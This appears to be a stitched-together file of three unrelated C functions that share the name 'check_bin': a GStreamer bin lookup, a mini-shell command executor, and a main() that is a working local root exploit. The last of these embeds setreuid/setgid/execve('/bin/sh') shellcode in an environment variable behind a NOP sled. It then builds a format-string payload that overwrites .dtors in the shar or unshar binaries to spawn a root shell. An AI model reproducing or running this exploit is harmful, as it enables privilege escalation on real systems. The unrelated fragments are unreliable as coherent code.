static GstBin * kms_agnostic_bin2_find_bin_for_caps (KmsAgnosticBin2 * self, GstCaps * caps) { GList *bins, *l; GstBin *bin = NULL; if (gst_caps_is_any (caps) || gst_caps_is_empty (caps)) { return self->priv->input_bin; } if (check_bin (KMS_TREE_BIN (self->priv->input_bin), caps)) { bin = self->priv->input_bin; } bins = g_hash_table_get_values (self->priv->bins); for (l = bins; l != NULL && bin == NULL; l = l->next) { KmsTreeBin *tree_bin = KMS_TREE_BIN (l->data); if (check_bin (tree_bin, caps)) { bin = GST_BIN_CAST (tree_bin); } } g_list_free (bins); return bin; }
void exec(t_cmd *cmd) { pid_t pid; int stat; stat = 0; if (ft_strchr(cmd->tab[0], '/')) cmd->bin = 1; if (!sh_cmd(cmd)) return ; else if (cmd->bin == 1 || check_bin(cmd)) { gestion_signal(1); if ((pid = fork()) < 0) sh_error(1, cmd, -1); else if (pid == 0) if ((stat = execve(cmd->cmd, cmd->tab, cmd->env)) == -1) sh_error(2, cmd, stat); wait(&stat); if (WIFEXITED(stat)) cmd->ret = WEXITSTATUS(stat); else if (WIFSIGNALED(stat)) signal_message_exec(WTERMSIG(stat)); gestion_signal(0); } else sh_error(0, cmd, 0); }
int main(void) { int16_t check_bin(void); u_int32_t get_dtors(int8_t* path); int16_t get_auto_stack_offset(int8_t *binpath); void banner(void); int8_t envbuf[1000]; int8_t store_env[1010]; int8_t *shar_path = SHAR_PATH; int8_t *unshar_path = UNSHAR_PATH; static u_int8_t shellcode[] = // setreuid(0,0) "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 // setgid(0) "\x31\xdb" // xor %ebx,%ebx "\x89\xd8" // mov %ebx,%eax "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 banner(); if(!check_bin()) exit(EXIT_FAILURE); memset(envbuf,NOP,sizeof(envbuf)); strcpy((int8_t *)&envbuf[sizeof(envbuf) - strlen(shellcode)],shellcode); memcpy(store_env,"CANDY=",6); strcat(store_env,envbuf); putenv(store_env); if(!putenv) { if(errno == ENOMEM) { strerror(errno); exit(EXIT_FAILURE); } } const int8_t *USEBIN; int16_t USE_OFFSET; if(WBIN == 1){ printf("[+]Exploiting the unshar binary\n"); USEBIN = unshar_path; } if(WBIN == 2){ printf("[+]Default binary is shar\n"); USEBIN = shar_path; } if(WBIN == 3) { printf("[+]Exploiting Shar binary\n"); USEBIN = shar_path; } int8_t store[200]; u_int32_t fakebuf = 0xbffffffa - strlen(store_env) - strlen("/usr/bin/shar") + 50; u_int32_t write_dtors = get_dtors((int8_t *)USEBIN); int8_t *dtors_target[3] = { (int8_t *) write_dtors + 2, (int8_t *) write_dtors, NULL }; int16_t env_most, env_low; env_most = (fakebuf & 0xffff0000) >> 16 ; env_low = (fakebuf & 0x0000ffff); env_most -= 0x8; USE_OFFSET = get_auto_stack_offset((int8_t *)USEBIN); sprintf(store,"%s%%.%dx%%%d$hn%%.%dx%%%d$hn", &dtors_target, (u_int16_t)env_most, USE_OFFSET, (env_low - env_most) - 0x8, USE_OFFSET + 1); fprintf(stdout,"[+]Type some command,sh$ prompt may not occur\n"); fprintf(stdout,"[+]Terminal echoing is possibly off \n"); fprintf(stdout,"Type any shell command Here i.e 'id' or 'ps aux'\n"); execlp(USEBIN,USEBIN,store); fflush(stdin); fflush(stdout); return EXIT_SUCCESS; // useless, never return }